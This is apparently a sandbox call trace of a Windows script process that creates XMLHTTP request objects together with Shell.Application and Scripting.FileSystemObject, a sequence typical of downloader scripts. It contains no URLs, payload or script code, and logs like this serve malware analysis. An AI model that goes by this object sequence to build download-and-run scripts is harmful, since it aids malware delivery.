	[0770.525] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0770.525] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0770.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0770.525] ??2@YAPEAX_K@Z () returned 0x62f310
	[0770.525] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0770.525] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0770.525] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0770.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0770.525] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0770.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.525] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0770.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0770.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0770.526] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0770.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0771.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0771.583] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0771.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0771.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0771.583] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0771.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0771.584] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0771.584] SysStringLen (param_1=0x0) returned 0x0
	[0771.584] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0771.584] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0771.584] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0771.584] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0771.584] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0771.584] ??2@YAPEAX_K@Z () returned 0x62f350
	[0771.584] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0771.584] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0771.584] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0771.584] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0771.584] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0771.584] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0771.584] SysStringLen (param_1=0x0) returned 0x0
	[0771.584] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0771.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0771.587] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0771.587] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0771.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0771.587] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0771.587] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0774.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0774.863] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0774.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0774.864] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.864] SysStringLen (param_1=0x0) returned 0x0
	[0774.864] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0774.865] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0774.865] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0774.865] ??2@YAPEAX_K@Z () returned 0x62f310
	[0774.865] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0774.865] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.865] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0774.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0774.865] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0774.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.865] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.868] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.868] SysStringLen (param_1=0x0) returned 0x0
	[0774.868] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.868] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0774.868] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0774.868] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0774.869] ??2@YAPEAX_K@Z () returned 0x62f330
	[0774.869] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0774.869] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.869] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0774.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0774.869] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0774.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.869] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.869] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.869] SysStringLen (param_1=0x0) returned 0x0
	[0774.869] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0774.870] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0774.870] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0774.870] ??2@YAPEAX_K@Z () returned 0x62f310
	[0774.870] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0774.870] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0774.870] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0774.870] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0774.870] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0774.870] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0774.870] SysStringLen (param_1=0x0) returned 0x0
	[0774.871] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0774.871] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
